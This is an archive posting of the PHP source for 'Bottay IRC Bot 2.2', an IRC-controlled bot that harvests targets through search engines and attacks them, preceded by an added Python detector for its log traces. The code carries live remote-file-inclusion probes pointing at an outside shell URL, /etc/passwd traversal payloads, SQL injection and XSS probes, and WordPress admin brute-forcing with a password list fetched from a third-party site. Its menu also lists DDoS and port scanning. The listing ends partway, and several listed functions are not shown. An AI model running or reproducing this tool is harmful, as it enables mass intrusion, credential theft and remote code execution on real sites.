
Bottay IRC Bot 2.2

Posted Jun 30, 2011
Authored by Burtay

Bottay IRC Bot can perform a battery of tests against a given system including, but not limited to, SQL injection, cross site scripting, Joomla/Wordpress detection, port scanning, denial of service, and more.

tags | denial of service, xss, sql injection
SHA-256 | 18bd6eb21ba923dcc2bba1cd7d4cd17791dc289e5163fed5252aeb3105cf92ed
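
For defenders, the probe strings hard-coded in the listing below leave recognisable traces in web server access logs. The following Python detector is an added example, not part of Bottay or of the original page: it flags those probes in combined-format log lines and counts repeated `wp-login.php` POSTs per client. The log lines, client addresses, the host `files.example.invalid` and the threshold of 5 are constructed assumptions.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Combined-log-format request line. Apache writes a literal quote inside the
# request as \" so the target is taken as a run of non-space characters.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+" (?P<status>\d{3}) '
)

# Signatures derived from constants in the Bottay 2.2 listing, applied to the
# URL-decoded request target.
SIGNATURES = [
    # $lfi_shell: run of ../ ending in etc/passwd, optionally followed by %00
    ("lfi_probe", re.compile(r"=(?:\.\./){3,}etc/passwd\x00?$")),
    # rfi(): first parameter value replaced by an absolute URL ending in "?"
    ("rfi_probe", re.compile(r"\?[^=&]+=https?://[^&]+\?$", re.I)),
    # $sql_ek: the two characters 'a appended to the full URL
    ("sql_error_probe", re.compile(r"=[^&]*'a$")),
    # $versiyon_regex / $hex_code: hex encoding of <botversion> or <burtay>
    ("sql_hex_marker", re.compile(
        r"0x3c(?:626f7476657273696f6e|627572746179)3e", re.I)),
    # $xss_regex: the fixed alert("burtay") payload
    ("xss_probe", re.compile(r'<script>alert\("burtay"\)</script>', re.I)),
]


def classify(target):
    """Return the names of the signatures matched by one request target."""
    decoded = unquote_plus(target.replace('\\"', '"'))
    return [name for name, rx in SIGNATURES if rx.search(decoded)]


def scan(lines, wp_threshold=5):
    """Map client IP -> sorted finding names for an iterable of log lines."""
    findings = defaultdict(set)
    wp_posts = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # blank or malformed line
        ip, target = m["ip"], m["target"]
        findings[ip].update(classify(target))
        # wordpress(): one POST to /wp-login.php per password in the list
        path = target.split("?", 1)[0]
        if m["method"] == "POST" and path.endswith("/wp-login.php"):
            wp_posts[ip] += 1
    for ip, count in wp_posts.items():
        if count >= wp_threshold:  # threshold is an assumption, tune per site
            findings[ip].add("wp_login_bruteforce")
    return {ip: sorted(names) for ip, names in findings.items() if names}


# Constructed sample log (documentation address ranges, invented timestamps).
SAMPLE_LOG = r"""
192.0.2.10 - - [30/Jun/2011:10:00:01 +0000] "GET /index.php?page=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 200 512 "-" "-"
192.0.2.10 - - [30/Jun/2011:10:00:02 +0000] "GET /index.php?page=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 512 "-" "-"
192.0.2.10 - - [30/Jun/2011:10:00:03 +0000] "GET /news.php?id=5'a HTTP/1.1" 500 310 "-" "-"
192.0.2.10 - - [30/Jun/2011:10:00:04 +0000] "GET /news.php?id=5+and+1=0+union+select+concat(0x3C626F7476657273696F6E3E,version(),0x3C2F626F7476657273696F6E3E)-- HTTP/1.1" 200 800 "-" "-"
192.0.2.10 - - [30/Jun/2011:10:00:05 +0000] "GET /view.php?file=http://files.example.invalid/rfi.txt? HTTP/1.1" 200 640 "-" "-"
192.0.2.10 - - [30/Jun/2011:10:00:06 +0000] "GET /search.php?q=\"><script>alert(\"burtay\")</script> HTTP/1.1" 200 431 "-" "-"
203.0.113.5 - - [30/Jun/2011:10:01:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 900 "-" "Mozilla/5.0"
203.0.113.5 - - [30/Jun/2011:10:01:30 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
""" + 6 * (
    '198.51.100.7 - - [30/Jun/2011:10:05:00 +0000] '
    '"POST /wp-login.php HTTP/1.1" 200 2100 "-" "-"\n'
)

if __name__ == "__main__":
    for client, names in scan(SAMPLE_LOG.splitlines()).items():
        print(client, ", ".join(names))
```

A hit on `sql_error_probe` or `rfi_probe` alone is weak evidence; several distinct signatures from one client in a short window is the stronger indicator.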

<?php
/*
Bottay V 2.2 Version
Coded By Burtay | cwburtay@hotmail.com
Burtay.Org | Cyber-Warrior.Org | Megaturks.Net | Rootarea.Com
Special Thanks RMx
--------------------------------------------------------------------------------------------------------
#Tutorial Videos
1.Bottay V.2.1 for Dummies
http://www.youtube.com/watch?v=CAYfQeM4e3g
2.Bottay: putting the bot into a channel (How to join channel)
http://www.youtube.com/watch?v=r6QnTcLhKbw
3.Bottay SQL injection Scan
http://www.youtube.com/watch?v=7C2DwB9g1b0
4.Bottay V.2.0 (Identifying the Joomla sites on the target site and getting onto the server by scanning for RFI)(Target Server Scan)
http://www.youtube.com/watch?v=vzPx9RDLdZg
5. Bottay V.2.0 Joomla Token Scan
http://www.youtube.com/watch?v=D3GX8b44LCs
6. Bottay V.2.0 Demonstration
http://www.youtube.com/watch?v=oPFpfiWSptA
7. Bottay V2.0 Target Server Scan (how to find a vulnerability in the target on a site that does not run an off-the-shelf system)
http://www.youtube.com/watch?v=4BswZURkXqk
8. Bottay V2.1. MySQL Injection Dumper
http://www.youtube.com/watch?v=uvvnXB9qCNw
9. Bottay general walkthrough (RFI, LFI, XSS and SQL scanning - cracking the WordPress admin panel by brute force)
http://vimeo.com/12827547
10.Bottay V.2.0 DDos
http://www.youtube.com/watch?v=kjQIpE0-5V4
----------------------------------------------------------------------------------------------------------
* Bottay is an IRC bot that can do the following:
* RFI,LFI,LFD,XSS,MySQL Injection,MSSQL Injection,ORACLE Injection,Access Injection Scanner
* MySQL column count and version finder
* Admin Panel Finder
* Google and Bing Searcher
* HTTP Flood (DDos)
* ReverseIP
* Wordpress Auto Detection
* Joomla Auto Detection
* Wordpress Brute-Forcer (Auto detection for reverseIP or your list)
* Port Scanner
* Joomla Bug Scanner (RFI,LFI and Token)
* [+]YouTube Downloader -> added (25.12.2010)
* [+]MySQL Injection Dumper -> added (29.12.2010)
*/

error_reporting(0);
set_time_limit(0);

class IRC_BOT
{

#Admin Informations
private $password = "CodedByBurtay";
private $admin = "burtay";
private $mail = 'cwburtay@hotmail.com';
#IRC server Datas
private $server = '127.0.0.1';
private $port = 6667;
private $nick = 'Bottay';
private $kanal = '#burtay';
private $baglan;
private $ex;
private $log;
private $google_dil;
private $google_adres;
private $durum = 0;
#Bottay Datas
private $log_dosyasi = "Bottay-Log.txt";
private $alt = "\n";

#Search Engine Datas
private $google_regex = '#<h3 class="r"><a href="(.*?)"#si';
private $bing_regex = '#<h3><a href="(.*?)" onmousedown=#si';
#Reverse IP Datas
private $reverse_site = 'http://www.yougetsignal.com/tools/web-sites-on-web-server/php/get-web-sites-on-web-server-json-data.php?remoteAddress=';
private $reverse_regex = '#"(.*?)"#si';
private $reverse_dosya = 'reverse.txt';

private $shell_adresi = 'http://t00lz.t0.funpic.org/rfi.txt?';
private $rfi_regex = 'burtay';
private $xss_regex = '"><script>alert("burtay")</script>';

private $bug_log = 'bug_log.txt';
private $toplu_bug = 'toplu.txt';
private $rfi_log = 'rfi.txt';
private $lfi_log = 'lfi.txt';
private $lfd_log = 'lfd.txt';
private $xss_log = 'xss.txt';
private $mysql_log = 'mysql.txt';
private $mssql_log = 'mssql.txt';
private $access_log = 'access.txt';
private $oracle_log = 'oracle.txt';
private $blind_log = 'blind.txt';
private $wp_log = 'wp.txt';

private $lfi_shell = '../../../../../../../../../../../../../../../etc/passwd';
private $lfi_regex = 'root:x:';//Only Linux Servers
private $sql_ek = "'a";
private $sql_shell = '+and+1=0';
private $sql_shell2 = '+and+1=1';
#Custom (non-CMS) script scan
private $link_regex = '#<a href="(.*?)"#si';
private $ozgun_site = 'ozgun.txt';
#Wordpress Scanner Datas
private $incele_wp = 'wp.txt';
private $wordpress_regex = array('general.php','wp-content','wp-includes');
private $basic_password = 'http://birlahealthcare.co.uk/App_Themes/blue/images/wp.txt';
private $wp_durum;
#Joomla Scanner Datas
private $joomla_regex = array('components','option=com_');
private $incele_joomla = 'joomla.txt';
private $joom_sql;
private $joom_rfi = 'http://birlahealthcare.co.uk/App_Themes/blue/images/joomla_rfi.txt';
private $token_ilk = '/?option=com_user&view=reset&layout=confirm';
private $token_son = '/?option=com_user&task=confirmreset';
private $md5_regex = '/[0-9a-f]{32}/si';
private $joom_durum;
#SQL Scanner Datas
private $kolon_sayisi = 50;
private $version;
private $max_kolon = 50;
private $versiyon_regex = array('concat(0x3C626F7476657273696F6E3E,version(),0x3C2F626F7476657273696F6E3E)','#<botversion>(.*?)</botversion>#si');
private $mysql_regex = array('MySQL','mysql_fetch_array()','Sql syntax','mysql_fetch_row()','mysql_num_rows()','ODBC SQL');
private $mssql_regex = array('MSSQL','Unclosed',"'dbo'");
private $access_regex = array('Access','JET Database','for JDBC');
private $oracle_regex = array('ORACLE','ORA-01756');
#Colors
private $siyah = '1';
private $mavi = '2';
private $yesil = '3';
private $kirmizi = '4';
private $kahverengi = '5';
private $mor = '6';
private $turuncu = '7';
private $sari = '8';
public $google_renk;
#Youtube Downloader
private $youtube_regex = '#http://v(.*?)&id=[0-9a-f]{16}#si';
private $youtube_isim = '#<title>(.*?)</title>#si';
private $youtube_linkler = array();
#Download Datas
private $boyut_regex = '/Content-Length: (\d+)/';
private $uzanti_regex = '/Content-Type: (a-z0-9){3}/';
#MySQL Dumper Datas
private $hex_code = array('0x3c6275727461793e','0x3c2f6275727461793e');
private $dumper_regex = '#<burtay>(.*?)</burtay>#si';


public function __construct()
{
$this->google_renk = $this->mavi . "G" . $this->kirmizi . "o" . $this->sari . "o" . $this->mavi . "g" . $this->yesil . "l" . $this->kirmizi . "e " . $this->kahverengi . " " ;


//Open the socket by calling the baglan() method
$this->baglan();

//Send the NICK, USER and channel name needed to join the channel
$this->ilk_adim();

//Call the method that keeps the bot in the channel
$this->kanalda_kal();

}


//Method that opens a socket to the IRC server on the configured port
private function baglan()
{
$this->baglan = fsockopen($this->server,$this->port,$error_no,$error_str,10);
if($this->baglan)
{
$this->durum = 1;
}
}

//Method that performs the steps needed to join the channel after connecting to the IRC server
private function ilk_adim()
{
$this->nick = $this->nick . rand(1,100);
//Send NICK over the open socket
fputs($this->baglan,"NICK ".$this->nick . $this->alt);

//Send USER over the open socket
fputs($this->baglan,"USER ".$this->nick ." " . $this->server . " ". $this->server . " : " .$nick . $this->alt);

//Send the JOIN command over the open socket
fputs($this->baglan,"JOIN ".$this->kanal. $this->alt);

//Announce that Bottay has joined the channel
$this->yaz($this->kirmizi . "Bottay Kanala Girdi.Açýn Önümü Lan ");
$this->yaz($this->kirmizi . "Coded By ". $this->yesil . base64_decode("YnVydGF5"));
}

private function kanalda_kal()
{
//While loop that keeps the bot in the channel
while (! feof($this->baglan))
{
//Data received from the socket
$this->log = fgets($this->baglan,128);

//Write the data received from the socket to the log file
$this->kayit($this->log_dosyasi,nl2br($this->log));

//Method that splits the incoming data on spaces
$this->ayir($this->log);

//
$komut = explode(":",$this->ex[3]);
$komut = trim($komut[1]);
ob_flush();
flush();
usleep(5000);
echo $this->log."<br>";

if($this->ex[0]=="PING")
{
fputs($this->baglan,"PONG ".$this->ex[1]."\n");
$this->yaz($this->kirmizi ."Bilgi:". $this->mavi . "PONG gönderildi");
echo "Bilgi:PONG Gönderildi <br>";
}

if ($komut == "!login")
{
$this->login();
}

elseif( $this->login_kontrol() and $komut == "!logout" )
{
$this->logout();
}
elseif($this->ex[1]=="KICK" and $this->ex[3] == $this->nick)
{
fputs($this->baglan,"JOIN ".$this->kanal. $this->alt);
}
elseif ($komut == "!help" and $this->login_kontrol() )
{
$this->yaz($this->mavi . "Coded By ".base64_decode("YnVydGF5"));
$this->yaz($this->mavi . "Bottay V.2.2");
$this->test();
}

elseif ($komut == "!cikis" and $this->login_kontrol() )
{
$this->yaz($this->kirmizi . "Cikis Yapilmakta");
fputs($this->baglan,"QUIT Allaha Ismarlaldýk\n");
}

###Google
elseif ($komut == "!google" and $this->login_kontrol() )
{
foreach( $this->google() as $xxx )
$this->yaz($xxx);
}

###Bing
elseif ($komut == "!bing" and $this->login_kontrol() )
{

foreach( $this->bing() as $xxx )
{
$this->yaz($xxx);
}
}

###Google short URL
elseif ($komut == "!google_kýsa" and $this->login_kontrol() )
{
foreach( $this->google() as $xxx )
{
$siteler = $this->url_kisalt($xxx);
$this->yaz($siteler);
}
}
####TEST
elseif ($komut == "!test" and $this->login_kontrol() )
{
$this->test();
}

###RFI
elseif ($komut == "!rfi" and $this->login_kontrol() )
{
$this->yaz($this->mor . "RFI Taramasi Baþladi");
foreach( $this->google() as $xxx )
{
$this->rfi($xxx);
}
foreach( $this->bing() as $xxx )
{
$this->rfi($xxx);
}
$this->yaz($this->mor . "RFI Taramasi Bitti");
}
###LFI
elseif ($komut == "!lfi" and $this->login_kontrol() )
{
$this->yaz($this->mor . "LFI Taramasi Basladi");
foreach( $this->google() as $xxx )
{
$this->lfi($xxx);
}
foreach( $this->bing() as $xxx )
{
$this->lfi($xxx);
}
$this->yaz($this->mor . "LFI Taramasi Bitti");
}

###LFD
elseif ($komut == "!lfd" and $this->login_kontrol() )
{
$this->yaz($this->mor . "LFD Taramasi Baþladi");
foreach( $this->google() as $xxx )
{
$this->lfd($xxx);
}
foreach( $this->bing() as $xxx )
{
$this->lfd($xxx);
}
$this->yaz($this->mor . "LFD Taramasi Bitti");
}

###SQL
elseif ($komut == "!sql" and $this->login_kontrol() )
{
$this->yaz($this->mor . "SQL Injection Taramasi Baþladi");
foreach( $this->google() as $xxx )
{
$this->sql($xxx);
}
foreach( $this->bing() as $xxx )
{
$this->sql($xxx);
}
$this->yaz($this->mor . "SQL Injection Taramasi Bitti");
}

###MySQL Versiyon
elseif ($komut == "!mysql_versiyon" and $this->login_kontrol() )
{
$this->yaz($this->mor . "MySQL Versiyon Taramasi Baþladi");
$this->versiyon_bul();
$this->yaz($this->mor . "MySQL Versiyon Taramasi Bitti");
}

###Blind SQL
elseif ($komut == "!blind_sql" and $this->login_kontrol() )
{
$this->yaz($this->mor . "Blind SQL Injection Taramasi Baþladi");
foreach( $this->google() as $xxx )
{
$this->blind_sql($xxx);
}
foreach( $this->bing() as $xxx )
{
$this->blind_sql($xxx);
}
$this->yaz($this->mor . "Blind SQL Injection MySQL Taramasi Bitti");
}
###Wordpress Brute Force
elseif ($komut == "!wordpress" and $this->login_kontrol() )
{
$this->yaz($this->mor . "Wordpress Taramasi Basladi");
foreach( $this->google() as $xxx )
{
$xxx = $this->url_kisalt($xxx);
$this->wordpress($xxx);
}
$this->yaz($this->mor . "Wordpress Taramasi Bitti");
}
###ReverseIP
elseif ($komut == "!reverse" and $this->login_kontrol() )
{
$this->reverse_ip();
}
###Manual posting
elseif ($komut == "!mgg" and $this->login_kontrol() )
{
$this->mgg();
}

###XSS
elseif ($komut == "!xss" and $this->login_kontrol() )
{
$this->yaz($this->mor . "XSS Taramasi Baþladi");
foreach( $this->google() as $xxx )
{
$this->xss($xxx);
}
foreach( $this->bing() as $xxx )
{
$this->xss($xxx);
}
$this->yaz($this->mor . "XSS Taramasi Bitti");
}
elseif ($komut == "!incele" and $this->login_kontrol() )
{
$this->incele();
}

#Automatic WordPress attacks against the sites on the target server
elseif ($komut == "!wp-auto" and $this->login_kontrol() )
{
$this->wordpress_oto();
}
#WordPress attacks against a single chosen site
elseif ($komut == "!wp-brute" and $this->login_kontrol() )
{
$this->wordpress($this->ex[4]);
}
#WordPress attacks against sites supplied as a list
elseif ($komut == "!wp-brute-liste" and $this->login_kontrol() )
{
$siteler = $this->get2($this->ex[4]);
$explode("\n",$siteler);
$this->yaz($this->mavi ."Denenecek Toplam Site " . $this->yesil ." ". count($explode) );
foreach($siteler as $site)
{
$this->wordpress($site);
}
}
elseif ($komut == "!joom-auto" and $this->login_kontrol() )
{
$this->joom_auto();
}

elseif ($komut == "!joom-token" and $this->login_kontrol() )
{
$this->joom_token($this->ex[4]);
}

elseif ($komut == "!joom-token-liste" and $this->login_kontrol() )
{
$siteler = $this->get($this->ex[4]);
$this->yaz($this->ex[4]);
$explode = explode("\n",$siteler);
$this->yaz($this->mavi ."Denenecek Toplam Site " . $this->yesil ." ". count($explode) );
foreach($explode as $site)
{
$this->joom_token($site);
}
}
#The extracted custom scripts are scanned automatically
elseif ($komut == "!ozgun" and $this->login_kontrol() )
{
$this->ozgun();
}
#DDos
elseif ($komut == "!ddos" and $this->login_kontrol() )
{
$this->DDos();
}
#Port Scanner
elseif ($komut == "!port" and $this->login_kontrol() )
{
$this->port_scanner();
}
#Youtube Video Downloader
elseif($komut == "!youtube" and $this->login_kontrol())
{
$this->youtube_isim($this->ex[4]);
}
#MySQL Injection Dumper
elseif($komut == "!dump" and $this->login_kontrol())
{
$this->dump();
}
#Returns an error if the user is not logged in
elseif(eregi("!",$komut) and !$this->login_kontrol() )
{
$this->yaz($this->mor . "Komut Vermek için Yetkiniz Yok");
}
}
}

private function login()
{

if($_SESSION["admin"] != '')
{
$this->yaz($this->yesil."Zaten giriþ yapmýþsýnýz");
}
elseif( trim($this->ex[4]) == $this->password )
{
$_SESSION["admin"] = 'admin';
$this->yaz($this->yesil . "Basarili sekilde giris Yaptiniz Tebrikler");
}
else
{
$this->yaz($this->kirmizi . "Hatalý GiriS");
}
}

private function login_kontrol()
{

if( $_SESSION["admin"] == 'admin' )
{
return true;
}
else
{
return false;
}
}

private function logout()
{
$this->yaz($this->kirmizi . "Cikis Yapildi");
unset($_SESSION["admin"]);
}

private function yaz($bunu)
{

# Sends the message passed in from outside through $bunu
# baglan() must have been called before this method can work
# because the socket is held in $this->baglan
fputs($this->baglan,"PRIVMSG " . $this->kanal . " : ". $bunu . "\n" );
}

private function get($site)
{

$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_COOKIEJAR,dirname(__FILE__).'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEFILE,dirname(__FILE__).'cookie.txt');
curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,5);
curl_setopt($curl,CURLOPT_URL,$site);
$calis = curl_exec($curl);
curl_close($calis);
return $calis;
}

private function get2($site)
{

return file_get_contents($site);
}

private function header_al($site)
{
$curl = curl_init();
curl_setopt($curl,CURLOPT_HEADER,1);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl, CURLOPT_NOBODY, 1);
curl_setopt($curl,CURLOPT_TIMEOUT,5);
curl_setopt($curl,CURLOPT_URL,$site);
$calis = curl_exec($curl);
curl_close($calis);
return $calis;
}

private function post($site,$post)
{
$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_TIMEOUT,5);
curl_setopt($curl,CURLOPT_URL,$site);
curl_setopt($curl,CURLOPT_COOKIEJAR,dirname(__FILE__).'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEFILE,dirname(__FILE__).'cookie.txt');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,$post);
$calis = curl_exec($curl);
curl_close($calis);
return $calis;
}

private function google()
{

//$this->google_dil();

$this->google_adres = $this->ex[4];
$this->yaz($this->turuncu ."Arama Yapýlacak Google Domaini " . $this->yesil . $this->google_adres);
$this->google_dil = $this->ex[5];
$this->yaz($this->turuncu ."Arama Yapýlacak dil " . $this->yesil . $this->google_dil );
if( $this->google_dil=='multi' or $this->google_dil=='')
{
$this->google_dil='';
$this->yaz($this->turuncu ."Arama Yapýlacak dil " . $this->yesil ." Bütün diller");
}

// First word sent in the channel after the command
$kelime = urlencode($this->ex[6]);
// Second word sent in the channel after the command
$basla = $this->ex[7]-1;
// Third word sent in the channel after the command
$bit = $this->ex[8]-1;
// Define an array to collect the results (via array_push) so they can be returned from the method
$sonucs = array();
// For loop over the start and end pages sent from the channel
for($id=$basla ; $id<=$bit ; $id++)
{
$sayfa_no = $id+1;
$this->yaz( $this->google_renk . $sayfa_no .". Sayfa Linkleri Alýnýyor");
//Multiply the page number by 10 to match the start parameter of the Google URL
$rakam = $id*10;
//Build the URL from the page offset and the search term
$site= $this->google_adres . "/search?q=".$kelime."&lr=lang_".$this->google_dil ."&start=".$rakam."&sa=N";
//Extract the results with the regex
preg_match_all($this->google_regex,$this->get($site),$sonucfonk);
//Iterate over the array returned by the regex
foreach($sonucfonk[1] as $yazdir)
{
//Strip any HTML tags from the value
$sonuc = strip_tags($yazdir);
//Remove the amp; junk (28.12.2010, thanks CW-Casper)
$sonuc = str_replace('amp;','',$sonuc);
//Push the value onto the results array so it can be returned from the method
array_push($sonucs,$sonuc);
}
}
//Return the array filled by array_push
//$this->yaz($google_renk . "Toplam Alýnan Link ". $this->yesil . ($bit+1)*100 );
return $sonucs;

}

private function bing()
{

$sonucs = array();
// First word sent in the channel after the command
$kelime = urlencode($this->ex[6]);
// Second word sent in the channel after the command
$basla = $this->ex[7];
// Third word sent in the channel after the command
$bit = $this->ex[8];
for($sayi=$basla ; $sayi<=$bit ; $sayi++)
{
$this->yaz($this->mavi . "B" . $this->turuncu . "i" . $this->mavi ."ng " . $this->kahverengi ." " . $sayi ." Sayfa Linkleri Alýnýyor");
$sayfa = $sayi*10+1;
$site = 'http://www.bing.com/search?q='.$kelime.'&filt=all&first='.$sayfa.'&FORM=PERE';
preg_match_all($this->bing_regex,$this->get($site),$bingfonk);
foreach($bingfonk[0] as $bing)
{
$duz = substr($bing,13,-14);
$duz = str_replace('amp;','',$duz);
array_push($sonucs,$duz);
}
}
return $sonucs;

}

private function test()
{

if ( ereg ( $this->rfi_regex,$this->get($this->shell_adresi) ) )
{
$this->yaz($this->yesil ."Shell Adress is Working.You can Scan RFI");
}
else
{
$this->yaz($this->kirmizi . "Shell Adress is Not Working");
}
if(ereg("123456",$this->get($this->basic_password)))
{$this->yaz($this->yesil ."Basic Passwords is Working!You can use Brute Force for Wordpress Admin Panel");}
else{$this->yaz($this->kirmizi . "Basic Passwords is NOT Working'");}
if( eregi("/components/com_flyspray/startdown.php?file=",$this->get($this->joom_rfi)) )
{$this->yaz($this->yesil ."Joomla RFI Database is Loaded.You can scan");}
else{$this->yaz($this->kirmizi . "Joomla RFI Database is Not Loaded!");}
}

private function rfi($gelen)
{

$site = $this->explode_rfi($gelen);
$this->yaz($this->mor . "RFI Testing " . $this->turuncu . $site);
if( ereg ($this->rfi_regex,$this->get( $site.$this->shell_adresi )) )
{
$this->yaz($this->kirmizi . "R". $this->mavi ."F". $this->sari ."I " .$this->yesil . $site);
if( eregi ($this->url_kisalt($gelen),file_get_contents($this->toplu_bug)) )
{
$this->yaz($this->kirmizi . " Bu Bug Daha önceden Kayýt edilmiþ" );
}
else
{
$this->bug_kayit("RFI ".$site);
$this->kayit($this->rfi_log,$gelen."/n");
}
}
}

private function lfi($gelen)
{

$site = $this->explode_rfi($gelen);
$this->yaz($this->mor . "LFI Testing " . $this->turuncu . $site);
if( ereg ($this->lfi_regex,$this->get( $site.$this->lfi_shell )) )
{
$this->yaz($this->kirmizi . "L". $this->mavi ."F". $this->sari ."I " .$this->yesil . $site.$this->lfi_shell ."%00");
if( eregi ($this->url_kisalt($gelen),file_get_contents($this->toplu_bug)) )
{
$this->yaz($this->kirmizi . " Bu Bug Daha önceden Kayýt edilmiþ" );
}
else
{
$this->bug_kayit("LFI ".$site.$this->lfi_shell);
$this->kayit($this->lfi_log,$gelen.$this->lfi_shell ."\n");
}
}
elseif( ereg ($this->lfi_regex,$this->get( $site.$this->lfi_shell ."%00" )) )
{
$this->yaz($this->kirmizi . "L". $this->mavi ."F". $this->sari ."I " .$this->yesil . $site.$this->lfi_shell ."%00");
if( eregi ($this->url_kisalt($gelen),file_get_contents($this->toplu_bug)) )
{
$this->yaz($this->kirmizi . " Bu Bug Daha önceden Kayýt edilmiþ" );
}
else
{
$this->bug_kayit("LFI ".$site.$this->lfi_shell ."%00");
$this->kayit($this->lfi_log,$gelen.$this->lfi_shell ."%00 \n");
}
}
}

private function xss($gelen)
{

$gelen = $this->explode_rfi($gelen);
$this->yaz($this->mor . "XSS Testing " . $this->turuncu . $gelen);
if( ereg ($this->rfi_regex,$this->get($gelen.$this->xss_regex) ) )
{
$this->yaz($this->kirmizi . "X" .$this->yesil . "S" . $this->kirmizi . "S " . $this->yesil . $gelen);
if( eregi ($this->url_kisalt($gelen),file_get_contents($this->toplu_bug)) )
{
$this->yaz($this->kirmizi . " Bu Bug Daha önceden Kayýt edilmiþ" );
}
else
{
$this->bug_kayit("XSS ".$gelen);
$this->kayit($this->xss_log,$gelen ."\n");
}
}

}

private function sql($gelen)
{

$this->yaz($this->mor . "SQL Testing " . $this->turuncu . $gelen.$this->sql_ek);
$site = $this->get($gelen.$this->sql_ek );
if( eregi($this->mysql_regex[1],$site) or eregi($this->mysql_regex[2],$site) or eregi($this->mysql_regex[3],$site) or eregi($this->mysql_regex[4],$site) or eregi($this->mysql_regex[5],$site) )
{
$this->yaz($this->kirmizi . "M". $this->mavi ."y". $this->sari ."S" .$this->yesil . "Q" . $this->kirmizi . "L " . $this->yesil . $gelen);
if( eregi ($this->url_kisalt($gelen),file_get_contents($this->toplu_bug)) )
{
$this->yaz($this->kirmizi . " Bu Bug Daha önceden Kayýt edilmiþ" );
}
else
{
//$this->versiyon_bul($gelen);
$this->kayit($this->mysql_log,$gelen ."\n");
$this->bug_kayit("MySQL Injection ".$gelen);
}
}
elseif( eregi($this->mssql_regex[1],$site) or eregi($this->mssql_regex[2],$site))
{
$this->yaz($this->kirmizi . "M". $this->mavi ."S". $this->sari ."S" .$this->yesil . "Q" . $this->kirmizi . "L " . $this->yesil . $gelen);
if( eregi ($this->url_kisalt($gelen),file_get_contents($this->toplu_bug)) )
{
$this->yaz($this->kirmizi . " Bu Bug Daha önceden Kayýt edilmiþ" );
}
else
{
$this->bug_kayit("MSSQL Injection ".$gelen);
$this->kayit($this->mssql_log,$gelen ."\n");
}
}
elseif( eregi($this->access_regex[1],$site) or eregi($this->access_regex[2],$site) )
{
$this->yaz($this->kirmizi . "A". $this->mavi ."c". $this->sari ."c" .$this->yesil . "e" . $this->kirmizi . "s" . $this->kirmizi . "s " . $this->yesil . $gelen);
if( eregi ($this->url_kisalt($gelen),file_get_contents($this->toplu_bug)) )
{
$this->yaz($this->kirmizi . " Bu Bug Daha önceden Kayýt edilmiþ" );
}
else
{
$this->bug_kayit("Access SQL Injection ".$gelen);
$this->kayit($this->access_log,$gelen ."\n");
}
}
elseif( eregi($this->oracle_regex[1],$site) )
{
$this->yaz($this->kirmizi . "O". $this->mavi ."R". $this->sari ."A" .$this->yesil . "C" . $this->kirmizi . "L" . $this->kirmizi . "E " . $this->yesil . $gelen);
if( eregi ($this->url_kisalt($gelen),file_get_contents($this->toplu_bug)) )
{
$this->yaz($this->kirmizi . " Bu Bug Daha önceden Kayýt edilmiþ" );
}
else
{
$this->bug_kayit("ORACLE SQL Injection ".$gelen);
$this->kayit($this->oracle_log,$gelen ."\n");
}
}
}

private function versiyon_bul($site)
{

if ( $site == null )
$site = $this->ex[4];
$site = trim($site) .$this->sql_shell . "+union+select+". $this->versiyon_regex[0];
$this->yaz($this->turuncu . "Kolon Sayýsý bulunuyor");
for($i=1 ; $i<=$this->max_kolon ; $i++)
{
$kaynak = $this->get($site.'--');
$title = preg_match($this->versiyon_regex[1],$kaynak,$versiyon);
if ($title)
{
$this->yaz($this->yesil . "Kolon Sayisi Bulundu : ".$this->kirmizi . ' ' . $i);
$this->yaz($this->yesil ."Versiyonu : " . $this->kirmizi . ' '. $versiyon[1] );
$this->kolon_sayisi = $i;
$this->version = $versiyon[1];
break;
}
$site = $site.','.$this->versiyon_regex[0];
}
}

private function url_kisalt($url)
{

$ayir = explode("/",$url);
return "http://".$ayir[2];
}

private function wordpress($site)
{

$this->yaz($this->mavi . "Taranan Site : ". $this->turuncu . $site);
foreach($this->basic_password() as $passwords)
{
$password = trim($passwords);
$this->yaz("Denenen Sifre ".$password);
$post ="log=admin&pwd=".$password."&testcookie=1";
if( eregi ($this->wordpress_regex[0],$this->post($site."/wp-login.php",$post) ) )
{
$this->yaz($this->yesil.$site .$this->kirmizi." adresi Wordpress taramasinda kirilmistir.Sifresi".$this->mor." ".$password);
break;
}
}
}

private function reverse_ip()
{

unlink ($this->reverse_dosya);
touch ($this->reverse_dosya);
//Get the target site
$site = $this->ex[4];
//Announce that the run has started
$this->yaz($this->mor . "ReverseIP iþlemi Baþladi");
//Fetch the page source
$kaynak = $this->get($this->reverse_site . $site);
//Extract the full list of sites
$ayir = explode('[[',$kaynak);
$ayir = explode(', ""]]',$ayir[1]);
preg_match_all($this->reverse_regex,$ayir[0],$siteler);
foreach($siteler[1] as $sitem)
{
if (eregi ("www.",$sitem) )
{
$sitem = substr($sitem,4);
}
$kontrol = $this->get2($this->reverse_dosya);
if (! eregi ($sitem,$kontrol) and $sitem !="")
{
$this->kayit($this->reverse_dosya,trim($sitem)."\n");
}
}
$explode = explode("\n",$this->get2($this->reverse_dosya));
$toplam = count($explode) - 1;
$this->yaz($this->mor . "toplam". $this->yesil . " " . $toplam . $this->mor ." site var");
$this->yaz($this->turuncu . "siteler dosyaya kaydedildi.ayrýþtýrma iþlemi için ".$this->kirmizi ."!incele");
}

private function kayit($dosya,$gelen)
{

$ac = fopen($dosya,'ab');
fwrite($ac,$gelen);
fclose($ac);
}

